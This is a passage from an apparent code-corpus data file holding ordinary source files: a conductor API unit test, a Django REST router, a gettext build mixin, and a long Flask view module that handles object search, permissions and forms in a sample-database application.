the results from getbalance and listtransactions. Create new transactions sending to each address. Generate a block containing the new transactions. Check the latest results from getbalance and listtransactions. | 2,577 | en | 0.827854 |
#
# -------------------------------------------------------------------------
# Copyright (c) 2018 Intel Corporation Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
"""Test case for RootController /"""
import json
from conductor import version
from conductor.tests.unit.api import base_api
class TestRoot(base_api.BaseApiTest):
def test_get_index(self):
actual_response = self.app.get('/')
req_json_file = './conductor/tests/unit/api/controller/versions.json'
expected_response = json.loads(open(req_json_file).read())
versions = expected_response.get('versions')
for version_obj in versions:
version_obj['version'] = "of-has:{}".format(version.version_info.version_string())
self.assertEqual(200, actual_response.status_int)
self.assertJsonEqual(expected_response,
json.loads(actual_response.body.decode()))
| conductor/conductor/tests/unit/api/controller/test_root.py | 1,536 | Test case for RootController /
------------------------------------------------------------------------- Copyright (c) 2018 Intel Corporation Intellectual Property Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ------------------------------------------------------------------------- | 781 | en | 0.734668 |
from apollo.viewsets import UserViewSet
from applications.assets.viewsets import EquipmentViewSet, ServiceViewSet
from applications.business.viewsets import BusinessViewSet, BusinessMembershipViewSet
from applications.charge_list.viewsets import ChargeListViewSet, ActivityChargeViewSet, \
ActivityChargeActivityCountViewSet, TimeChargeViewSet, UnitChargeViewSet
from applications.price_list.viewsets import PriceListViewSet, ActivityPriceListItemViewSet, TimePriceListItemViewSet, \
UnitPriceListItemViewSet, PriceListItemEquipmentViewSet, PriceListItemServiceViewSet
from applications.station.viewsets import StationViewSet, StationBusinessViewSet, StationRentalViewSet
from applications.terms_of_service.viewsets import TermsOfServiceViewSet
from rest_framework.routers import DefaultRouter
# Internal API Definition
router = DefaultRouter()
router.register(r'account/user', UserViewSet, base_name='user')
router.register(r'account/terms_of_service', TermsOfServiceViewSet, base_name='terms-of-service')
router.register(r'business/business', BusinessViewSet, base_name='business')
router.register(r'business/business_membership', BusinessMembershipViewSet, base_name='business-membership')
router.register(r'equipment/equipment', EquipmentViewSet, base_name='equipment')
router.register(r'equipment/service', ServiceViewSet, base_name='service')
router.register(r'station/station', StationViewSet, base_name='station')
router.register(r'station/station_business', StationBusinessViewSet, base_name='station-business')
router.register(r'station/station_rental', StationRentalViewSet, base_name='station-rental')
router.register(r'price_list/price_list', PriceListViewSet, base_name='price-list')
router.register(r'price_list/activity_item', ActivityPriceListItemViewSet, base_name='activity-price-list-item')
router.register(r'price_list/time_item', TimePriceListItemViewSet, base_name='time-price-list-item')
router.register(r'price_list/unit_item', UnitPriceListItemViewSet, base_name='unit-price-list-item')
router.register(r'price_list/equipment_relation', PriceListItemEquipmentViewSet, base_name='price-list-item-equipment')
router.register(r'price_list/service_relation', PriceListItemServiceViewSet, base_name='price-list-item-service')
router.register(r'charge_list/charge_list', ChargeListViewSet, base_name='charge-list')
router.register(r'charge_list/activity_charge', ActivityChargeViewSet, base_name='activity-charge')
router.register(r'charge_list/activity_charge_activity_count', ActivityChargeActivityCountViewSet,
base_name='activity-charge-activity-count')
router.register(r'charge_list/time_charge', TimeChargeViewSet, base_name='time-charge')
router.register(r'charge_list/unit_charge', UnitChargeViewSet, base_name='unit-charge')
| apollo/router.py | 2,781 | Internal API Definition | 23 | en | 0.438078 |
from whey.mixin import BuilderMixin
class GettextMixin:
def build_messages(self: BuilderMixin):
from babel.messages.mofile import write_mo
from babel.messages.pofile import read_po
locales = self.pkgdir / "locales"
if self.verbose:
print(" Building messages")
for po in locales.glob("*/LC_MESSAGES/pm2hw.po"):
with po.open("rt", encoding="UTF-8") as f:
catalog = read_po(f, po.parts[-3], po.stem)
mo = self.build_dir / po.relative_to(self.project_dir).with_suffix(".mo")
mo.parent.maybe_make(parents=True)
with mo.open("wb") as f:
write_mo(f, catalog)
self.report_written(mo)
if self.verbose:
print(" Wrote language file:", mo)
# class SDistBuilder(GettextMixin, builder.SDistBuilder):
# def call_additional_hooks(self):
# self.build_messages()
# class WheelBuilder(GettextMixin, builder.WheelBuilder):
# def call_additional_hooks(self):
# self.build_messages()
| build_hooks.py | 925 | class SDistBuilder(GettextMixin, builder.SDistBuilder): def call_additional_hooks(self): self.build_messages() class WheelBuilder(GettextMixin, builder.WheelBuilder): def call_additional_hooks(self): self.build_messages() | 227 | en | 0.539856 |
# coding: utf-8
"""
"""
from copy import deepcopy
import datetime
import io
import json
import math
import os
import zipfile
import flask
import flask_login
import itsdangerous
import werkzeug.utils
from flask_babel import _
from . import frontend
from .. import logic
from .. import models
from .. import db
from ..logic import user_log, object_log, comments, object_sorting
from ..logic.actions import get_action, get_actions, get_action_type, get_action_types
from ..logic.action_type_translations import get_action_types_with_translations_in_language, \
get_action_type_with_translation_in_language
from ..logic.action_translations import get_action_with_translation_in_language
from ..logic.action_permissions import get_user_action_permissions, get_sorted_actions_for_user
from ..logic.object_permissions import Permissions, get_user_object_permissions, object_is_public, get_object_permissions_for_users, set_object_public, set_user_object_permissions, set_group_object_permissions, set_project_object_permissions, get_objects_with_permissions, get_object_info_with_permissions, get_object_permissions_for_groups, get_object_permissions_for_projects, request_object_permissions
from ..logic.datatypes import JSONEncoder
from ..logic.instrument_translations import get_instrument_with_translation_in_language
from ..logic.users import get_user, get_users, get_users_by_name
from ..logic.schemas import validate, generate_placeholder
from ..logic.settings import get_user_settings, set_user_settings
from ..logic.object_search import generate_filter_func, wrap_filter_func
from ..logic.groups import get_group, get_user_groups
from ..logic.objects import create_object, create_object_batch, update_object, get_object, get_object_versions
from ..logic.object_log import ObjectLogEntryType
from ..logic.projects import get_project, get_user_projects, get_user_project_permissions
from ..logic.locations import get_location, get_object_ids_at_location, get_object_location_assignment, get_object_location_assignments, get_locations, assign_location_to_object, get_locations_tree
from ..logic.languages import get_language_by_lang_code, get_language, get_languages, Language, get_user_language
from ..logic.files import FileLogEntryType
from ..logic.errors import GroupDoesNotExistError, ObjectDoesNotExistError, UserDoesNotExistError, ActionDoesNotExistError, ValidationError, ProjectDoesNotExistError, LocationDoesNotExistError, ActionTypeDoesNotExistError
from ..logic.notebook_templates import get_notebook_templates
from .objects_forms import ObjectPermissionsForm, ObjectForm, ObjectVersionRestoreForm, ObjectUserPermissionsForm, CommentForm, ObjectGroupPermissionsForm, ObjectProjectPermissionsForm, FileForm, FileInformationForm, FileHidingForm, ObjectLocationAssignmentForm, ExternalLinkForm, ObjectPublicationForm, CopyPermissionsForm
from ..utils import object_permissions_required
from .utils import jinja_filter, generate_qrcode
from .object_form_parser import parse_form_data
from .labels import create_labels, PAGE_SIZES, DEFAULT_PAPER_FORMAT, HORIZONTAL_LABEL_MARGIN, VERTICAL_LABEL_MARGIN, mm
from . import pdfexport
from .utils import check_current_user_is_not_readonly
from ..logic.utils import get_translated_text
__author__ = 'Florian Rhiem <f.rhiem@fz-juelich.de>'
def on_unauthorized(object_id):
permissions_by_user = get_object_permissions_for_users(object_id)
has_grant_user = any(
Permissions.GRANT in permissions
for permissions in permissions_by_user.values()
)
return flask.render_template('objects/unauthorized.html', object_id=object_id, has_grant_user=has_grant_user), 403
@frontend.route('/objects/')
@flask_login.login_required
def objects():
object_ids = flask.request.args.get('ids', '')
objects = []
display_properties = []
display_property_titles = {}
user_language_id = logic.languages.get_user_language(flask_login.current_user).id
if 'display_properties' in flask.request.args:
for property_info in flask.request.args.get('display_properties', '').split(','):
if ':' in property_info:
property_name, property_title = property_info.split(':', 1)
else:
property_name, property_title = property_info, property_info
if property_name not in display_properties:
display_properties.append(property_name)
display_property_titles[property_name] = property_title
name_only = True
if object_ids:
object_ids = object_ids.split(',')
try:
object_ids = [int(object_id) for object_id in object_ids]
except ValueError:
object_ids = []
readable_object_ids = []
for object_id in object_ids:
if Permissions.READ in get_user_object_permissions(object_id, user_id=flask_login.current_user.id):
readable_object_ids.append(object_id)
object_ids = readable_object_ids
for object_id in object_ids:
try:
objects.append(get_object(object_id))
except logic.errors.ObjectDoesNotExistError:
pass
action_id = None
action = None
action_type = None
project_id = None
location_id = None
location = None
user = None
user_id = None
doi = None
object_ids_at_location = None
project = None
group = None
group_id = None
query_string = ''
use_advanced_search = False
must_use_advanced_search = False
advanced_search_had_error = False
search_notes = []
search_tree = None
limit = None
offset = None
pagination_enabled = True
num_objects_found = len(objects)
sorting_property_name = None
sorting_order_name = None
else:
pagination_enabled = True
try:
user_id = int(flask.request.args.get('user', ''))
user = get_user(user_id)
except ValueError:
user_id = None
user = None
except UserDoesNotExistError:
user_id = None
user = None
if user_id is not None:
user_permissions = {
'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('user_permissions', '').lower())
else:
user_permissions = None
try:
doi = logic.publications.simplify_doi(flask.request.args.get('doi', ''))
except logic.errors.InvalidDOIError:
doi = None
try:
location_id = int(flask.request.args.get('location', ''))
location = get_location(location_id)
object_ids_at_location = get_object_ids_at_location(location_id)
except ValueError:
location_id = None
location = None
object_ids_at_location = None
except LocationDoesNotExistError:
location_id = None
location = None
object_ids_at_location = None
try:
action_id = int(flask.request.args.get('action', ''))
except ValueError:
action_id = None
if action_id is not None:
action = get_action_with_translation_in_language(action_id, user_language_id, use_fallback=True)
action_type = get_action_type_with_translation_in_language(action.type_id, user_language_id)
action_schema = action.schema
if not display_properties:
display_properties = action_schema.get('displayProperties', [])
for property_name in display_properties:
display_property_titles[property_name] = action_schema['properties'][property_name]['title']
else:
action = None
action_type_id = flask.request.args.get('t', '')
if action_type_id is not None:
try:
action_type_id = int(action_type_id)
except ValueError:
# ensure old links still function
action_type_id = {
'samples': models.ActionType.SAMPLE_CREATION,
'measurements': models.ActionType.MEASUREMENT,
'simulations': models.ActionType.SIMULATION
}.get(action_type_id, None)
if action_type_id is not None:
try:
action_type = get_action_type_with_translation_in_language(
action_type_id=action_type_id,
language_id=user_language_id
)
except ActionTypeDoesNotExistError:
action_type = None
else:
action_type = None
project_permissions = None
if display_properties:
name_only = False
try:
project_id = int(flask.request.args.get('project', ''))
except ValueError:
project_id = None
if project_id is not None:
if Permissions.READ not in get_user_project_permissions(project_id=project_id, user_id=flask_login.current_user.id, include_groups=True):
return flask.abort(403)
project = get_project(project_id)
project_permissions = {
'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('project_permissions', '').lower())
else:
project = None
group_permissions = None
try:
group_id = int(flask.request.args.get('group', ''))
except ValueError:
group_id = None
if group_id is not None:
try:
group = logic.groups.get_group(group_id)
group_member_ids = logic.groups.get_group_member_ids(group_id)
except logic.errors.GroupDoesNotExistError:
group = None
else:
if flask_login.current_user.id not in group_member_ids:
return flask.abort(403)
else:
group = None
if group is not None:
group_permissions = {
'read': Permissions.READ,
'write': Permissions.WRITE,
'grant': Permissions.GRANT
}.get(flask.request.args.get('group_permissions', '').lower())
else:
group_permissions = None
if flask.request.args.get('limit', '') == 'all':
limit = None
else:
try:
limit = int(flask.request.args.get('limit', ''))
except ValueError:
limit = None
else:
if limit <= 0:
limit = None
elif limit >= 1000:
limit = 1000
# default objects per page
if limit is None:
limit = get_user_settings(flask_login.current_user.id)['OBJECTS_PER_PAGE']
else:
set_user_settings(flask_login.current_user.id, {'OBJECTS_PER_PAGE': limit})
try:
offset = int(flask.request.args.get('offset', ''))
except ValueError:
offset = None
else:
if offset < 0:
offset = None
elif offset > 100000000:
offset = 100000000
if limit is not None and offset is None:
offset = 0
sorting_order_name = flask.request.args.get('order', None)
if sorting_order_name == 'asc':
sorting_order = object_sorting.ascending
elif sorting_order_name == 'desc':
sorting_order = object_sorting.descending
else:
sorting_order = None
sorting_property_name = flask.request.args.get('sortby', None)
if sorting_order is None:
if sorting_property_name is None:
sorting_order_name = 'desc'
sorting_order = object_sorting.descending
else:
sorting_order_name = 'asc'
sorting_order = object_sorting.ascending
if sorting_property_name is None:
sorting_property_name = '_object_id'
else:
name_only = False
if sorting_property_name == '_object_id':
sorting_property = object_sorting.object_id()
elif sorting_property_name == '_creation_date':
sorting_property = object_sorting.creation_date()
elif sorting_property_name == '_last_modification_date':
sorting_property = object_sorting.last_modification_date()
else:
sorting_property = object_sorting.property_value(sorting_property_name)
sorting_function = sorting_order(sorting_property)
query_string = flask.request.args.get('q', '')
if query_string:
name_only = False
search_tree = None
use_advanced_search = flask.request.args.get('advanced', None) is not None
must_use_advanced_search = use_advanced_search
advanced_search_had_error = False
additional_search_notes = []
if not use_advanced_search and query_string:
if user_id is None:
users = get_users_by_name(query_string)
if len(users) == 1:
user = users[0]
user_id = user.id
query_string = ''
elif len(users) > 1:
additional_search_notes.append(('error', "There are multiple users with this name.", 0, 0))
if doi is None and query_string.startswith('doi:'):
try:
doi = logic.publications.simplify_doi(query_string)
query_string = ''
except logic.errors.InvalidDOIError:
pass
try:
filter_func, search_tree, use_advanced_search = generate_filter_func(query_string, use_advanced_search)
except Exception:
# TODO: ensure that advanced search does not cause exceptions
if use_advanced_search:
advanced_search_had_error = True
def filter_func(data, search_notes):
""" Return all objects"""
search_notes.append(('error', "Unable to parse search expression", 0, len(query_string)))
return False
else:
raise
filter_func, search_notes = wrap_filter_func(filter_func)
search_notes.extend(additional_search_notes)
if user_id is None or user_permissions is not None:
object_ids_for_user = None
else:
object_ids_for_user = user_log.get_user_related_object_ids(user_id)
if doi is None:
object_ids_for_doi = None
else:
object_ids_for_doi = logic.publications.get_object_ids_linked_to_doi(doi)
if use_advanced_search and not must_use_advanced_search:
search_notes.append(('info', _("The advanced search was used automatically. Search for \"%(query_string)s\" to use the simple search.", query_string=query_string), 0, 0))
try:
object_ids = None
if object_ids_at_location is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_at_location)
if object_ids_for_user is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_for_user)
if object_ids_for_doi is not None:
if object_ids is None:
object_ids = set()
object_ids = object_ids.union(object_ids_for_doi)
if object_ids is not None:
pagination_enabled = False
limit = None
offset = None
if object_ids is not None and not object_ids:
objects = []
num_objects_found = 0
else:
num_objects_found_list = []
objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ,
filter_func=filter_func,
sorting_func=sorting_function,
limit=limit,
offset=offset,
action_id=action_id,
action_type_id=action_type.id if action_type is not None else None,
other_user_id=user_id,
other_user_permissions=user_permissions,
project_id=project_id,
project_permissions=project_permissions,
group_id=group_id,
group_permissions=group_permissions,
object_ids=object_ids,
num_objects_found=num_objects_found_list,
name_only=name_only
)
num_objects_found = num_objects_found_list[0]
except Exception as e:
search_notes.append(('error', "Error during search: {}".format(e), 0, 0))
objects = []
num_objects_found = 0
if any(note[0] == 'error' for note in search_notes):
objects = []
advanced_search_had_error = True
cached_actions = {}
cached_users = {}
for i, obj in enumerate(objects):
if obj.version_id == 0:
original_object = obj
else:
original_object = get_object(object_id=obj.object_id, version_id=0)
if obj.action_id not in cached_actions:
cached_actions[obj.action_id] = get_action(obj.action_id)
if obj.user_id not in cached_users:
cached_users[obj.user_id] = get_user(obj.user_id)
if original_object.user_id not in cached_users:
cached_users[original_object.user_id] = get_user(original_object.user_id)
objects[i] = {
'object_id': obj.object_id,
'created_by': cached_users[original_object.user_id],
'created_at': original_object.utc_datetime,
'modified_by': cached_users[obj.user_id],
'last_modified_at': obj.utc_datetime,
'data': obj.data,
'schema': obj.schema,
'action': cached_actions[obj.action_id],
'display_properties': {}
}
for property_name in display_properties:
if property_name not in objects[i]['data'] or '_type' not in objects[i]['data'][property_name] or property_name not in objects[i]['schema']['properties']:
objects[i]['display_properties'][property_name] = None
continue
objects[i]['display_properties'][property_name] = (objects[i]['data'][property_name], objects[i]['schema']['properties'][property_name])
if action_id is None:
show_action = True
else:
show_action = False
def build_modified_url(**kwargs):
return flask.url_for(
'.objects',
**{k: v for k, v in flask.request.args.items() if k not in kwargs},
**kwargs
)
action_ids = {
object['action'].id for object in objects
}
action_translations = {}
for id in action_ids:
action_translations[id] = logic.action_translations.get_action_translation_for_action_in_language(
action_id=id,
language_id=user_language_id,
use_fallback=True
)
return flask.render_template(
'objects/objects.html',
objects=objects,
display_properties=display_properties,
display_property_titles=display_property_titles,
search_query=query_string,
action=action,
action_translations=action_translations,
action_id=action_id,
action_type=action_type,
project=project,
project_id=project_id,
group=group,
group_id=group_id,
location_id=location_id,
location=location,
user_id=user_id,
user=user,
doi=doi,
get_object_if_current_user_has_read_permissions=get_object_if_current_user_has_read_permissions,
get_instrument_translation_for_instrument_in_language=logic.instrument_translations.get_instrument_translation_for_instrument_in_language,
build_modified_url=build_modified_url,
sorting_property=sorting_property_name,
sorting_order=sorting_order_name,
limit=limit,
offset=offset,
pagination_enabled=pagination_enabled,
num_objects_found=num_objects_found,
show_action=show_action,
use_advanced_search=use_advanced_search,
must_use_advanced_search=must_use_advanced_search,
advanced_search_had_error=advanced_search_had_error,
search_notes=search_notes,
search_tree=search_tree
)
@jinja_filter
def to_datatype(obj):
return json.loads(json.dumps(obj), object_hook=JSONEncoder.object_hook)
def get_sub_data_and_schema(data, schema, id_prefix):
sub_data = data
sub_schema = schema
try:
for key in id_prefix.split('__'):
if sub_schema['type'] == 'array':
key = int(key)
sub_schema = sub_schema['items']
elif sub_schema['type'] == 'object':
sub_schema = sub_schema['properties'][key]
else:
raise ValueError('invalid type')
if isinstance(key, int):
while key >= len(sub_data):
sub_data.append(generate_placeholder(sub_schema))
elif key not in sub_data:
sub_data[key] = generate_placeholder(sub_schema)
sub_data = sub_data[key]
if sub_schema['type'] != 'array':
raise ValueError('invalid type')
except (ValueError, KeyError, IndexError, TypeError):
# TODO: error handling/logging?
raise ValueError('invalid action')
return sub_data, sub_schema
def apply_action_to_form_data(action, form_data):
new_form_data = form_data
action_id_prefix, action_index, action_type = action[len('action_'):].rsplit('__', 2)
if action_type == 'delete':
deleted_item_index = int(action_index)
parent_id_prefix = action_id_prefix
new_form_data = {}
for name in form_data:
if not name.startswith(parent_id_prefix + '__'):
new_form_data[name] = form_data[name]
else:
item_index, id_suffix = name[len(parent_id_prefix) + 2:].split('__', 1)
item_index = int(item_index)
if item_index < deleted_item_index:
new_form_data[name] = form_data[name]
if item_index > deleted_item_index:
new_name = parent_id_prefix + '__' + str(item_index - 1) + '__' + id_suffix
new_form_data[new_name] = form_data[name]
return new_form_data
def apply_action_to_data(action, data, schema):
action_id_prefix, action_index, action_type = action[len('action_'):].rsplit('__', 2)
if action_type not in ('add', 'delete', 'addcolumn', 'deletecolumn'):
raise ValueError('invalid action')
sub_data, sub_schema = get_sub_data_and_schema(data, schema, action_id_prefix.split('__', 1)[1])
if action_type in ('addcolumn', 'deletecolumn') and (sub_schema["style"] != "table" or sub_schema["items"]["type"] != "array"):
raise ValueError('invalid action')
num_existing_items = len(sub_data)
if action_type == 'add':
if 'maxItems' not in sub_schema or num_existing_items < sub_schema["maxItems"]:
sub_data.append(generate_placeholder(sub_schema["items"]))
if isinstance(sub_data[-1], list) and sub_schema.get('style') == 'table':
num_existing_columns = sub_schema["items"].get("minItems", 0)
for row in sub_data:
num_existing_columns = max(num_existing_columns, len(row))
while len(sub_data[-1]) < num_existing_columns:
sub_data[-1].append(None)
elif action_type == 'delete':
action_index = int(action_index)
if ('minItems' not in sub_schema or num_existing_items > sub_schema["minItems"]) and action_index < num_existing_items:
del sub_data[action_index]
else:
num_existing_columns = sub_schema["items"].get("minItems", 0)
for row in sub_data:
num_existing_columns = max(num_existing_columns, len(row))
if action_type == 'addcolumn':
if 'maxItems' not in sub_schema["items"] or num_existing_columns < sub_schema["items"]["maxItems"]:
num_existing_columns += 1
for row in sub_data:
while len(row) < num_existing_columns:
row.append(generate_placeholder(sub_schema["items"]["items"]))
elif action_type == 'deletecolumn':
if num_existing_columns > sub_schema.get("minItems", 0):
num_existing_columns -= 1
for row in sub_data:
while len(row) > num_existing_columns:
del row[-1]
def show_object_form(object, action, previous_object=None, should_upgrade_schema=False, placeholder_data=None):
if object is None and previous_object is None:
data = generate_placeholder(action.schema)
if placeholder_data:
for path, value in placeholder_data.items():
try:
sub_data = data
for step in path[:-1]:
sub_data = sub_data[step]
sub_data[path[-1]] = value
except Exception:
# Ignore invalid placeholder data
pass
elif object is None and previous_object is not None:
data = logic.schemas.copy_data(previous_object.data, previous_object.schema)
else:
data = object.data
previous_object_schema = None
mode = 'edit'
if should_upgrade_schema:
mode = 'upgrade'
assert object is not None
schema = action.schema
data, upgrade_warnings = logic.schemas.convert_to_schema(object.data, object.schema, action.schema)
for upgrade_warning in upgrade_warnings:
flask.flash(upgrade_warning, 'warning')
elif object is not None:
schema = object.schema
elif previous_object is not None:
schema = previous_object.schema
previous_object_schema = schema
else:
schema = action.schema
if action is not None and action.instrument is not None and flask_login.current_user in action.instrument.responsible_users:
may_create_log_entry = True
create_log_entry_default = action.instrument.create_log_entry_default
instrument_log_categories = logic.instrument_log_entries.get_instrument_log_categories(action.instrument.id)
if 'create_instrument_log_entry' in flask.request.form:
category_ids = []
for category_id in flask.request.form.getlist('instrument_log_categories'):
try:
if int(category_id) in [category.id for category in instrument_log_categories]:
category_ids.append(int(category_id))
except Exception:
pass
else:
category_ids = None
else:
instrument_log_categories = None
category_ids = None
create_log_entry_default = None
may_create_log_entry = False
permissions_for_group_id = None
permissions_for_project_id = None
copy_permissions_object_id = None
if object is None:
if flask.request.form.get('permissions_method') == 'copy_permissions' and flask.request.form.get('copy_permissions_object_id'):
copy_permissions_object_id = flask.request.form.get('copy_permissions_object_id')
try:
copy_permissions_object_id = int(copy_permissions_object_id)
if Permissions.READ not in get_user_object_permissions(copy_permissions_object_id, flask_login.current_user.id):
flask.flash(_("Unable to copy permissions. Default permissions will be applied."), 'error')
copy_permissions_object_id = None
except Exception:
flask.flash(_("Unable to copy permissions. Default permissions will be applied."), 'error')
copy_permissions_object_id = None
elif flask.request.form.get('permissions_method') == 'permissions_for_group' and flask.request.form.get('permissions_for_group_group_id'):
permissions_for_group_id = flask.request.form.get('permissions_for_group_group_id')
try:
permissions_for_group_id = int(permissions_for_group_id)
if flask_login.current_user.id not in logic.groups.get_group_member_ids(permissions_for_group_id):
flask.flash(_("Unable to grant permissions to basic group. Default permissions will be applied."), 'error')
permissions_for_group_id = None
except Exception:
flask.flash(_("Unable to grant permissions to basic group. Default permissions will be applied."), 'error')
permissions_for_group_id = None
elif flask.request.form.get('permissions_method') == 'permissions_for_project' and flask.request.form.get('permissions_for_project_project_id'):
permissions_for_project_id = flask.request.form.get('permissions_for_project_project_id')
try:
permissions_for_project_id = int(permissions_for_project_id)
if flask_login.current_user.id not in logic.projects.get_project_member_user_ids_and_permissions(permissions_for_project_id, include_groups=True):
flask.flash(_("Unable to grant permissions to project group. Default permissions will be applied."), 'error')
permissions_for_project_id = None
except Exception:
flask.flash(_("Unable to grant permissions to project group. Default permissions will be applied."), 'error')
permissions_for_project_id = None
if previous_object is not None:
action_id = previous_object.action_id
previous_object_id = previous_object.id
has_grant_for_previous_object = Permissions.GRANT in get_user_object_permissions(user_id=flask_login.current_user.id, object_id=previous_object_id)
else:
action_id = action.id
previous_object_id = None
has_grant_for_previous_object = False
errors = []
object_errors = {}
form_data = {}
previous_actions = []
serializer = itsdangerous.URLSafeSerializer(flask.current_app.config['SECRET_KEY'])
form = ObjectForm()
if flask.request.method != 'GET' and form.validate_on_submit():
raw_form_data = {key: flask.request.form.getlist(key) for key in flask.request.form}
form_data = {k: v[0] for k, v in raw_form_data.items()}
if 'input_num_batch_objects' in form_data:
try:
num_objects_in_batch = int(form_data['input_num_batch_objects'])
except ValueError:
try:
# The form allows notations like '1.2e1' for '12', however
# Python can only parse these as floats
num_objects_in_batch = float(form_data['input_num_batch_objects'])
if num_objects_in_batch == int(num_objects_in_batch):
num_objects_in_batch = int(num_objects_in_batch)
else:
raise
except ValueError:
errors.append('input_num_batch_objects')
num_objects_in_batch = None
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
form_data['input_num_batch_objects'] = str(num_objects_in_batch)
else:
num_objects_in_batch = None
if 'previous_actions' in flask.request.form:
try:
previous_actions = serializer.loads(flask.request.form['previous_actions'])
except itsdangerous.BadData:
flask.abort(400)
if "action_submit" in form_data:
# The object name might need the batch number to match the pattern
if schema.get('batch', False) and num_objects_in_batch is not None:
name_suffix_format = schema.get('batch_name_format', '{:d}')
try:
name_suffix_format.format(1)
except (ValueError, KeyError):
name_suffix_format = '{:d}'
if name_suffix_format:
example_name_suffix = name_suffix_format.format(1)
else:
example_name_suffix = ''
if 'object__name__text' in form_data:
batch_base_name = form_data['object__name__text']
raw_form_data['object__name__text'] = [batch_base_name + example_name_suffix]
else:
enabled_languages = form_data.get('object__name__text_languages', [])
if 'en' not in enabled_languages:
enabled_languages.append('en')
for language_code in enabled_languages:
batch_base_name = form_data.get('object__name__text_' + language_code, '')
raw_form_data['object__name__text_' + language_code] = [batch_base_name + example_name_suffix]
else:
batch_base_name = None
name_suffix_format = None
object_data, object_errors = parse_form_data(raw_form_data, schema)
errors += object_errors
if object_data is not None and not errors:
try:
validate(object_data, schema)
except ValidationError:
# TODO: proper logging
print('object schema validation failed')
# TODO: handle error
flask.abort(400)
for markdown in logic.markdown_to_html.get_markdown_from_object_data(object_data):
markdown_as_html = logic.markdown_to_html.markdown_to_safe_html(markdown)
logic.markdown_images.mark_referenced_markdown_images_as_permanent(markdown_as_html)
if object is None:
if schema.get('batch', False) and num_objects_in_batch is not None:
if 'name' in object_data and 'text' in object_data['name'] and name_suffix_format is not None and batch_base_name is not None:
data_sequence = []
for i in range(1, num_objects_in_batch + 1):
if name_suffix_format:
name_suffix = name_suffix_format.format(i)
else:
name_suffix = ''
object_data['name']['text'] = batch_base_name + name_suffix
data_sequence.append(deepcopy(object_data))
else:
data_sequence = [object_data] * num_objects_in_batch
objects = create_object_batch(
action_id=action.id,
data_sequence=data_sequence,
user_id=flask_login.current_user.id,
copy_permissions_object_id=copy_permissions_object_id,
permissions_for_group_id=permissions_for_group_id,
permissions_for_project_id=permissions_for_project_id
)
object_ids = [object.id for object in objects]
if category_ids is not None:
log_entry = logic.instrument_log_entries.create_instrument_log_entry(
instrument_id=action.instrument.id,
user_id=flask_login.current_user.id,
content='',
category_ids=category_ids
)
for object_id in object_ids:
logic.instrument_log_entries.create_instrument_log_object_attachment(
instrument_log_entry_id=log_entry.id,
object_id=object_id
)
flask.flash(_('The objects were created successfully.'), 'success')
return flask.redirect(flask.url_for('.objects', ids=','.join([str(object_id) for object_id in object_ids])))
else:
object = create_object(
action_id=action.id,
data=object_data,
user_id=flask_login.current_user.id,
previous_object_id=previous_object_id,
schema=previous_object_schema,
copy_permissions_object_id=copy_permissions_object_id,
permissions_for_group_id=permissions_for_group_id,
permissions_for_project_id=permissions_for_project_id
)
if category_ids is not None:
log_entry = logic.instrument_log_entries.create_instrument_log_entry(
instrument_id=action.instrument.id,
user_id=flask_login.current_user.id,
content='',
category_ids=category_ids
)
logic.instrument_log_entries.create_instrument_log_object_attachment(
instrument_log_entry_id=log_entry.id,
object_id=object.id
)
flask.flash(_('The object was created successfully.'), 'success')
else:
if object_data != object.data or schema != object.schema:
update_object(object_id=object.id, user_id=flask_login.current_user.id, data=object_data, schema=schema)
flask.flash(_('The object was updated successfully.'), 'success')
return flask.redirect(flask.url_for('.object', object_id=object.id))
elif any(name.startswith('action_object__') and (name.endswith('__delete') or name.endswith('__add') or name.endswith('__addcolumn') or name.endswith('__deletecolumn')) for name in form_data):
action = [name for name in form_data if name.startswith('action_')][0]
previous_actions.append(action)
if previous_actions:
try:
for action in previous_actions:
apply_action_to_data(action, data, schema)
form_data = apply_action_to_form_data(previous_actions[-1], form_data)
except ValueError:
flask.abort(400)
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
referencable_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.READ
)
if object is not None:
referencable_objects = [
referencable_object
for referencable_object in referencable_objects
if referencable_object.object_id != object.object_id
]
else:
referencable_objects = []
existing_objects = []
sorted_actions = get_sorted_actions_for_user(
user_id=flask_login.current_user.id
)
action_type_id_by_action_id = {}
for action_type in get_action_types():
for action in get_actions(action_type.id):
action_type_id_by_action_id[action.id] = action_type.id
tags = [{'name': tag.name, 'uses': tag.uses} for tag in logic.tags.get_tags()]
users = get_users(exclude_hidden=True)
users.sort(key=lambda user: user.id)
english = get_language(Language.ENGLISH)
if object is None:
if not flask.current_app.config["LOAD_OBJECTS_IN_BACKGROUND"]:
existing_objects = get_objects_with_permissions(
user_id=flask_login.current_user.id,
permissions=Permissions.GRANT
)
user_groups = logic.groups.get_user_groups(flask_login.current_user.id)
user_projects = logic.projects.get_user_projects(flask_login.current_user.id, include_groups=True)
return flask.render_template(
'objects/forms/form_create.html',
action_id=action_id,
schema=schema,
data=data,
errors=errors,
object_errors=object_errors,
form_data=form_data,
previous_actions=serializer.dumps(previous_actions),
form=form,
can_copy_permissions=True,
existing_objects=existing_objects,
user_groups=user_groups,
user_projects=user_projects,
referencable_objects=referencable_objects,
sorted_actions=sorted_actions,
action_type_id_by_action_id=action_type_id_by_action_id,
